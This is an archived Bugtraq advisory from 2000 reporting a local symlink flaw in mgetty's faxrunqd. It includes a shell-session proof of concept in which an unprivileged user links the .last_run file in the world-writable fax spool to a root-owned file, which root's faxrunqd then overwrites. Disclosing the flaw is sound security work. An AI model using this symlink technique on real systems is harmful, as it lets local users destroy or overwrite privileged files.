[LWN Logo]
[Timeline]
Date:         Sat, 26 Aug 2000 02:23:05 -0400
From: Stan Bubrouski <satan@FASTDIAL.NET>
Subject:      Advisory: mgetty local compromise
To: BUGTRAQ@SECURITYFOCUS.COM

Author                 : Stan Bubrouski
Date                    : August 26, 2000
Package              : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity               : faxrunqd follows symbolic links when creating
certain files. The default location
                             for the files is /var/spool/fax/outgoing,
which is a world-writable directory. Local
                             users can destroy the contents of any file on
a mounted filesystem because faxrunqd is
                             usually run by root.
Problem              : mgetty comes with a program named faxrunqd, which is
a daemon to send fax jobs queued
                             by faxspool(1).  Upon successful execution, a
file named .last_run is created in the
                             /var/spool/fax/outgoing/ directory which is
world-writable.  The problem lies in the
                             fact faxrunqd will follow symlinks created by
any user, allowing file creation anywhere
                             and allowing existing files to be
overwritten/destroyed.
Example:

Remote unprivilaged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...

Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..
lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$

Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions                 (Vulnerable)
Linux-Mandrake 7.1 and all prior versions              (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1                          (Untested)
LinuxPPC 1999 and 2000                                     (Untested)
TurboLinux 4.0, 6.0                                              (Untested)
Debian 2.2 (potato), 2.1 (slink)                              (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2     (Untested)
MkLinux Pre Release 1 (R1)                                 (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4                            (Untested)
Think Blue Linux 1.0 (Linux for the S/390)              (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:
SuSE - all versions
Slackware - all versions